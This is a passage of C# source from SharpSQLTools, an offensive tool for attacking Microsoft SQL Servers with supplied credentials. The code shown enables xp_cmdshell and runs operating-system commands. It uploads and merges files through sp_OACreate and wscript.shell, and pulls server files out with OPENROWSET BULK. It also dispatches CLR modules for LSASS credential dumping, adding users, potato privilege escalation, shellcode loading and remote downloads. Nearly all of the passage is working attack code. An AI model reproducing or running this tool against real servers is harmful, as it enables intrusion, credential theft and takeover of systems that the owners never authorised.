presumably arrives through the InfoMessage event (see OnInfoMessage) — confirm 122 | } 123 | 124 | /// <summary>Reads the whole file at filePath into a byte array; returns null on any exception (the catch is untyped and silent).</summary> 125 | static byte[] ReadFileToByte(string filePath) 126 | { 127 | byte[] result; 128 | try 129 | { 130 | 
using (FileStream fileStream = new FileStream(filePath, FileMode.Open, FileAccess.Read)) 131 | { 132 | byte[] array = new byte[fileStream.Length]; 133 | fileStream.Read(array, 0, array.Length); // NOTE(review): the byte count Read returns is discarded; Stream.Read may return fewer bytes than requested, leaving the tail of the array zeroed 134 | result = array; 135 | } 136 | } 137 | catch 138 | { 139 | result = null; // every failure (missing file, access denied, ...) collapses to null; callers must check for it 140 | } 141 | return result; 142 | } 143 | /// <summary>Splits fileSize into chunk lengths: floor(fileSize/splitLength) entries of splitLength plus a final remainder entry when the division is not exact, or the single entry fileSize when it is not larger than splitLength (so 0 yields one entry of 0). The type argument on List was lost in this rendering; from its use it is a List of int.</summary> 144 | static private List SplitFileSize(int fileSize, int splitLength) 145 | { 146 | List list = new List(); 147 | if (fileSize > splitLength) 148 | { 149 | int num = fileSize / splitLength; // number of full chunks 150 | int num2 = fileSize % splitLength; // trailing partial chunk, 0 when the size divides evenly 151 | if (num > 0) // always true in this branch for a positive splitLength, since fileSize > splitLength 152 | { 153 | for (int i = 0; i < num; i++) 154 | { 155 | list.Add(splitLength); 156 | } 157 | if (num2 != 0) 158 | { 159 | list.Add(num2); 160 | } 161 | } 162 | } 163 | else 164 | { 165 | list.Add(fileSize); 166 | } 167 | return list; 168 | } 169 | 170 | /// <summary> 171 | /// Uploads localFile to remoteFile with the OLE Automation Procedures' ADODB.Stream object: the file is written in chunks of splitLength bytes as "{remoteFile}_{n}.config_txt", then merged with "copy /b" run through wscript.shell and the chunk files deleted (the loop continues below). 172 | /// </summary> 173 | /// <param name="localFile">Local file to read.</param> 174 | /// <param name="remoteFile">Destination path on the server; the routine returns early if it already exists.</param> 175 | static void UploadFiles(String localFile, String remoteFile) 176 | { 177 | Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile)); 178 | 179 | if (setting.Check_configuration("Ole Automation Procedures", 0) && !setting.Enable_ola()) 180 | { 181 | return; 182 | } 183 | byte[] byteArray = ReadFileToByte(localFile); // null when the local read fails; dereferenced at byteArray.Length below without a check 184 | string text = "copy /b "; // accumulates the cmd.exe line that will merge the chunk files 185 | if (setting.File_Exists(remoteFile, 1)) 186 | { 187 | Console.WriteLine("[+] {0} Exists", remoteFile); 188 | return; 189 | } 190 | int num = 0; // chunk index, used in the chunk file names 191 | int num2 = 0; // byte offset of the current chunk within byteArray 192 | int splitLength = 250000; // bytes per chunk; each chunk becomes a hex literal of twice that length inside its own T-SQL batch 193 | List list = SplitFileSize(byteArray.Length, splitLength); 194 | try 195 | { 196 | foreach (int num3 in list) 197 | { 198 | string text2 = string.Format("{0}_{1}.config_txt", remoteFile, num); // on-disk staging artifact left by this routine until the final del 199 | byte[] array = new byte[num3]; 200 | Array.Copy(byteArray, num2, array, 0, num3); 201 | string hexstr = string.Concat(from b in array 202 | select b.ToString("X2")); 203 | sqlstr = String.Format(@" 204 | DECLARE @ObjectToken INT 205 | EXEC sp_OACreate 'ADODB.Stream', 
@ObjectToken OUTPUT 206 | EXEC sp_OASetProperty @ObjectToken, 'Type', 1 207 | EXEC sp_OAMethod @ObjectToken, 'Open' 208 | EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0} 209 | EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2 210 | EXEC sp_OAMethod @ObjectToken, 'Close' 211 | EXEC sp_OADestroy @ObjectToken", hexstr, text2); 212 | Batch.RemoteExec(Conn, sqlstr, false); 213 | num2 += num3; 214 | num++; 215 | text = text + "\"" + text2 + "\"+"; 216 | Thread.Sleep(1000); 217 | if (setting.File_Exists(text2, 1)) 218 | { 219 | Console.WriteLine("[+] {0}_{1}.config_txt Upload completed", remoteFile, num); 220 | } 221 | else 222 | { 223 | Console.WriteLine("[!] {0}_{1}.config_txt Error uploading", remoteFile, num); 224 | Conn.Close(); 225 | Environment.Exit(0); 226 | } 227 | 228 | Thread.Sleep(1000); 229 | } 230 | 231 | text = text.Trim(new char[] 232 | { 233 | '+' 234 | }) + " \"" + remoteFile + "\"'"; 235 | string shell = String.Format(@" 236 | DECLARE @SHELL INT 237 | EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT 238 | EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c "); 239 | 240 | Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile); 241 | Batch.RemoteExec(Conn,shell + text, false); 242 | Thread.Sleep(1000); 243 | 244 | if (setting.File_Exists(remoteFile, 1)) 245 | { 246 | sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), "")); 247 | Console.WriteLine("[+] {0}", sqlstr.Replace("'", "")); 248 | Batch.RemoteExec(Conn, shell + sqlstr, false); 249 | Console.WriteLine("[*] '{0}' Upload completed", localFile); 250 | } 251 | //setting.Disable_ole(); 252 | } 253 | catch (Exception ex) 254 | { 255 | Conn.Close(); 256 | Console.WriteLine("[!] 
Error log: \r\n" + ex.Message); 257 | } 258 | } 259 | 260 | /// 261 | /// 文件下载,使用 OPENROWSET + BULK。将 memoryStream 直接写入文件 262 | /// 263 | /// 远程文件 264 | /// 本地文件 265 | static void DownloadFiles(String localFile, String remoteFile) 266 | { 267 | Console.WriteLine(String.Format("[*] Downloading '{0}' to '{1}'...", remoteFile, localFile)); 268 | 269 | if (!setting.File_Exists(remoteFile, 1)) 270 | { 271 | Console.WriteLine("[!] {0} file does not exist....", remoteFile); 272 | return; 273 | } 274 | 275 | sqlstr = String.Format(@"SELECT * FROM OPENROWSET(BULK N'{0}', SINGLE_BLOB) rs", remoteFile); // SINGLE_BLOB 选项将它们读取为二进制文件 276 | SqlCommand sqlComm = new SqlCommand(sqlstr, Conn); 277 | 278 | //接收查询到的sql数据 279 | using (SqlDataReader reader = sqlComm.ExecuteReader()) 280 | { 281 | //读取数据 282 | while (reader.Read()) 283 | { 284 | using (MemoryStream memoryStream = new MemoryStream((byte[])reader[0])) 285 | { 286 | using (FileStream fileStream = new FileStream(localFile, FileMode.Create, FileAccess.Write)) 287 | { 288 | byte[] bytes = new byte[memoryStream.Length]; 289 | memoryStream.Read(bytes, 0, (int)memoryStream.Length); 290 | fileStream.Write(bytes, 0, bytes.Length); 291 | } 292 | } 293 | } 294 | } 295 | 296 | Console.WriteLine("[*] '{0}' Download completed", remoteFile); 297 | } 298 | 299 | public static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args) 300 | { 301 | String value = String.Empty; 302 | foreach (SqlError err in args.Errors) 303 | { 304 | value = err.Message; 305 | Console.WriteLine(value); 306 | } 307 | } 308 | 309 | static void interactive(string[] args) 310 | { 311 | string target = args[0]; 312 | if (target.Contains(":")) 313 | { 314 | target = target.Replace(":", ","); 315 | } 316 | string username = args[1]; 317 | string password = args[2]; 318 | string database = args[3]; 319 | try 320 | { 321 | //sql建立连接 322 | string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", 
target, database, username, password); 323 | Conn = new SqlConnection(connectionString); 324 | Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage); 325 | Conn.Open(); 326 | Console.WriteLine("[*] Database connection is successful!"); 327 | } 328 | catch (Exception ex) 329 | { 330 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 331 | Environment.Exit(0); 332 | } 333 | 334 | setting = new Setting(Conn); 335 | 336 | try 337 | { 338 | do 339 | { 340 | Console.Write("SQL> "); 341 | string str = Console.ReadLine(); 342 | if (str.ToLower() == "exit") { Conn.Close(); break; } 343 | else if (str.ToLower() == "help") { Help(); continue; } 344 | 345 | string[] cmdline = str.Split(new char[] { ' ' }, 3); 346 | 347 | switch (cmdline[0].ToLower()) 348 | { 349 | case "enable_xp_cmdshell": 350 | setting.Enable_xp_cmdshell(); 351 | break; 352 | case "disable_xp_cmdshell": 353 | setting.Disable_xp_cmdshell(); 354 | break; 355 | case "xp_cmdshell": 356 | { 357 | String s = String.Empty; 358 | for (int i = 1; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 359 | xp_shell(s); 360 | break; 361 | } 362 | case "sp_oacreate": 363 | { 364 | String s = String.Empty; 365 | for (int i = 1; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 366 | sp_shell(s); 367 | break; 368 | } 369 | case "upload": 370 | UploadFiles(cmdline[1], cmdline[2]); 371 | break; 372 | case "download": 373 | DownloadFiles(cmdline[2], cmdline[1]); 374 | break; 375 | case "enable_ole": 376 | setting.Enable_ola(); 377 | break; 378 | case "disable_ole": 379 | setting.Disable_ole(); 380 | break; 381 | case "clr_dumplsass": 382 | { 383 | String s = String.Empty; 384 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 385 | clr_exec(s); 386 | break; 387 | } 388 | case "clr_ls": 389 | { 390 | String s = String.Empty; 391 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 392 | clr_exec(s); 393 | break; 394 | } 395 | case "clr_cat": 396 | { 397 | String s = 
String.Empty; 398 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 399 | clr_exec(s); 400 | break; 401 | } 402 | case "clr_cd": 403 | { 404 | String s = String.Empty; 405 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 406 | clr_exec(s); 407 | break; 408 | } 409 | case "clr_rm": 410 | { 411 | String s = String.Empty; 412 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 413 | clr_exec(s); 414 | break; 415 | } 416 | case "clr_ping": 417 | { 418 | String s = String.Empty; 419 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 420 | clr_exec(s); 421 | break; 422 | } 423 | case "clr_netstat": 424 | clr_exec("clr_netstat"); 425 | break; 426 | case "clr_rdp": 427 | clr_exec("clr_rdp"); 428 | break; 429 | case "clr_getav": 430 | clr_exec("clr_getav"); 431 | break; 432 | case "clr_ps": 433 | clr_exec("clr_ps"); 434 | break; 435 | case "clr_pwd": 436 | clr_exec("clr_pwd"); 437 | break; 438 | case "clr_adduser": 439 | { 440 | String s = String.Empty; 441 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 442 | clr_exec(s); 443 | break; 444 | } 445 | case "clr_exec": 446 | { 447 | String s = String.Empty; 448 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 449 | clr_exec(s); 450 | break; 451 | } 452 | case "clr_efspotato": 453 | { 454 | String s = String.Empty; 455 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 456 | clr_exec(s); 457 | break; 458 | } 459 | case "clr_badpotato": 460 | { 461 | String s = String.Empty; 462 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 463 | clr_exec(s); 464 | break; 465 | } 466 | case "clr_scloader": 467 | { 468 | String s = String.Empty; 469 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 470 | clr_exec(s); 471 | break; 472 | } 473 | case "clr_scloader1": 474 | { 475 | String s = String.Empty; 476 | for (int i = 0; i < cmdline.Length; i++) { s += 
cmdline[i] + " "; } 477 | clr_exec(s); 478 | break; 479 | } 480 | case "clr_scloader2": 481 | { 482 | String s = String.Empty; 483 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 484 | clr_exec(s); 485 | break; 486 | } 487 | case "clr_download": 488 | { 489 | String s = String.Empty; 490 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 491 | clr_exec(s); 492 | break; 493 | } 494 | case "clr_combine": 495 | { 496 | String s = String.Empty; 497 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 498 | clr_exec(s); 499 | break; 500 | } 501 | case "enable_clr": 502 | setting.Enable_clr(); 503 | break; 504 | case "disable_clr": 505 | setting.Disable_clr(); 506 | break; 507 | case "install_clr": 508 | { 509 | setting.install_clr(); 510 | break; 511 | } 512 | case "uninstall_clr": 513 | setting.drop_clr(); 514 | break; 515 | default: 516 | Console.WriteLine(Batch.RemoteExec(Conn, str, true)); 517 | break; 518 | 519 | } 520 | if (!ConnectionState.Open.Equals(Conn.State)) 521 | { 522 | Console.WriteLine("[!] Disconnect...."); 523 | break; 524 | } 525 | } 526 | while (true); 527 | } 528 | catch (Exception ex) 529 | { 530 | Conn.Close(); 531 | Console.WriteLine("[!] 
Error log: \r\n" + ex.Message); 532 | } 533 | } 534 | 535 | static void Noninteractive(string[] args) 536 | { 537 | if (args.Length < 4) 538 | { 539 | Help(); 540 | return; 541 | } 542 | string target = args[0]; 543 | if (target.Contains(":")) 544 | { 545 | target = target.Replace(":", ","); 546 | } 547 | string username = args[1]; 548 | string password = args[2]; 549 | string database = args[3]; 550 | string module = args[4]; 551 | try 552 | { 553 | //sql建立连接 554 | string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password); 555 | Conn = new SqlConnection(connectionString); 556 | Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage); 557 | Conn.Open(); 558 | Console.WriteLine("[*] Database connection is successful!"); 559 | } 560 | catch (Exception ex) 561 | { 562 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 563 | Environment.Exit(0); 564 | } 565 | 566 | setting = new Setting(Conn); 567 | try 568 | { 569 | // string[] cmdline = str.Split(new char[] { ' ' }, 3); 570 | 571 | switch (module.ToLower()) 572 | { 573 | case "enable_xp_cmdshell": 574 | setting.Enable_xp_cmdshell(); 575 | break; 576 | case "disable_xp_cmdshell": 577 | setting.Disable_xp_cmdshell(); 578 | break; 579 | case "xp_cmdshell": 580 | { 581 | String command = String.Empty; 582 | if (args.Length > 6) 583 | { 584 | for (int i = 5; i < args.Length; i++) { command += args[i] + " "; } 585 | } 586 | else 587 | { 588 | command = args[5]; 589 | } 590 | xp_shell(command); 591 | break; 592 | } 593 | case "sp_oacreate": 594 | { 595 | { 596 | String command = String.Empty; 597 | if (args.Length > 6) 598 | { 599 | for (int i = 5; i < args.Length; i++) { command += args[i] + " "; } 600 | } 601 | else 602 | { 603 | command = args[5]; 604 | } 605 | sp_shell(command); 606 | break; 607 | } 608 | } 609 | case "upload": 610 | UploadFiles(args[5], args[6]); 611 | break; 612 | case "download": 613 | 
DownloadFiles(args[6], args[5]); 614 | break; 615 | case "enable_ole": 616 | setting.Enable_ola(); 617 | break; 618 | case "disable_ole": 619 | setting.Disable_ole(); 620 | break; 621 | case "clr_dumplsass": 622 | { 623 | String s = String.Empty; 624 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 625 | clr_exec(s); 626 | break; 627 | } 628 | case "clr_ping": 629 | { 630 | String s = String.Empty; 631 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 632 | clr_exec(s); 633 | break; 634 | } 635 | case "clr_cat": 636 | { 637 | String s = String.Empty; 638 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 639 | clr_exec(s); 640 | break; 641 | } 642 | case "clr_ls": 643 | { 644 | String s = String.Empty; 645 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 646 | clr_exec(s); 647 | break; 648 | } 649 | case "clr_cd": 650 | { 651 | String s = String.Empty; 652 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 653 | clr_exec(s); 654 | break; 655 | } 656 | case "clr_rm": 657 | { 658 | String s = String.Empty; 659 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 660 | clr_exec(s); 661 | break; 662 | } 663 | case "clr_pwd": 664 | clr_exec("clr_pwd"); 665 | break; 666 | case "clr_netstat": 667 | clr_exec("clr_netstat"); 668 | break; 669 | case "clr_ps": 670 | clr_exec("clr_ps"); 671 | break; 672 | case "clr_rdp": 673 | clr_exec("clr_rdp"); 674 | break; 675 | case "clr_getav": 676 | clr_exec("clr_getav"); 677 | break; 678 | case "clr_adduser": 679 | { 680 | String s = String.Empty; 681 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 682 | clr_exec(s); 683 | break; 684 | } 685 | case "clr_exec": 686 | { 687 | String s = String.Empty; 688 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 689 | clr_exec(s); 690 | break; 691 | } 692 | case "clr_efspotato": 693 | { 694 | String s = String.Empty; 695 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 696 
| clr_exec(s); 697 | break; 698 | } 699 | case "clr_badpotato": 700 | { 701 | String s = String.Empty; 702 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 703 | clr_exec(s); 704 | break; 705 | } 706 | case "clr_scloader": 707 | { 708 | String s = String.Empty; 709 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 710 | clr_exec(s); 711 | break; 712 | } 713 | case "clr_scloader1": 714 | { 715 | String s = String.Empty; 716 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 717 | clr_exec(s); 718 | break; 719 | } 720 | case "clr_scloader2": 721 | { 722 | String s = String.Empty; 723 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 724 | clr_exec(s); 725 | break; 726 | } 727 | case "clr_download": 728 | { 729 | String s = String.Empty; 730 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 731 | clr_exec(s); 732 | break; 733 | } 734 | case "clr_combine": 735 | { 736 | String s = String.Empty; 737 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 738 | clr_exec(s); 739 | break; 740 | } 741 | case "enable_clr": 742 | setting.Enable_clr(); 743 | break; 744 | case "disable_clr": 745 | setting.Disable_clr(); 746 | break; 747 | case "install_clr": 748 | { 749 | setting.install_clr(); 750 | break; 751 | } 752 | case "uninstall_clr": 753 | setting.drop_clr(); 754 | break; 755 | default: 756 | Console.WriteLine(Batch.RemoteExec(Conn, args[3], true)); 757 | break; 758 | 759 | } 760 | if (!ConnectionState.Open.Equals(Conn.State)) 761 | { 762 | Console.WriteLine("[!] Disconnect...."); 763 | } 764 | Conn.Close(); 765 | } 766 | catch (Exception ex) 767 | { 768 | Conn.Close(); 769 | Console.WriteLine("[!] 
Error log: \r\n" + ex.Message); 770 | } 771 | } 772 | static void Main(string[] args) 773 | { 774 | if (args.Length == 4) 775 | { 776 | interactive(args); 777 | } 778 | else if (args.Length > 4) 779 | { 780 | Noninteractive(args); 781 | } 782 | else 783 | { 784 | logo(); 785 | Console.WriteLine("Usage:"); 786 | Console.WriteLine(@" 787 | SharpSQLTools target:port username password database - interactive console 788 | SharpSQLTools target:port username password database module command - non-interactive console"); 789 | Console.WriteLine("\nModule:"); 790 | Help(); 791 | return; 792 | } 793 | 794 | } 795 | } 796 | } 797 | --------------------------------------------------------------------------------